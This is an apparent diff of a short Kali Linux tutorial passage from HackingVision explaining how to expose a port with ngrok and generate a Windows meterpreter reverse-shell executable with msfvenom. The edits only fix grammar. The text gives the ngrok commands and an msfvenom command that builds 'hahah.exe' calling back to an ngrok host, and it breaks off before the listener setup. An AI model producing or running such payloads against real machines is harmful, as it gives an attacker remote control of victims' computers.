How to use Msfvenom with ngrok Kali Linux Tutorial – HackingVision

 Now we need to add our ngrok auth token, we can do this by using command.

 ./ngrok authtoken <YOUR_AUTH_TOKEN>

-Once auth token has been accepted launch ngrok using command below.
+Once auth token has been accepted launch ngrok using the command below.

 ./ngrok http 2323

-You can change port to what ever port u want to open.
+You can change the port to whatever port u want to open.

 Copy and paste the ngrok URL.

 now hit create hostname and open terminal type this command msfvenom -p windows/meterpreter/http LHOST=520f6cc2.ngrok.io LPORT=2323 X> hahah.exe

 Open a new command terminal and use commands below to start services.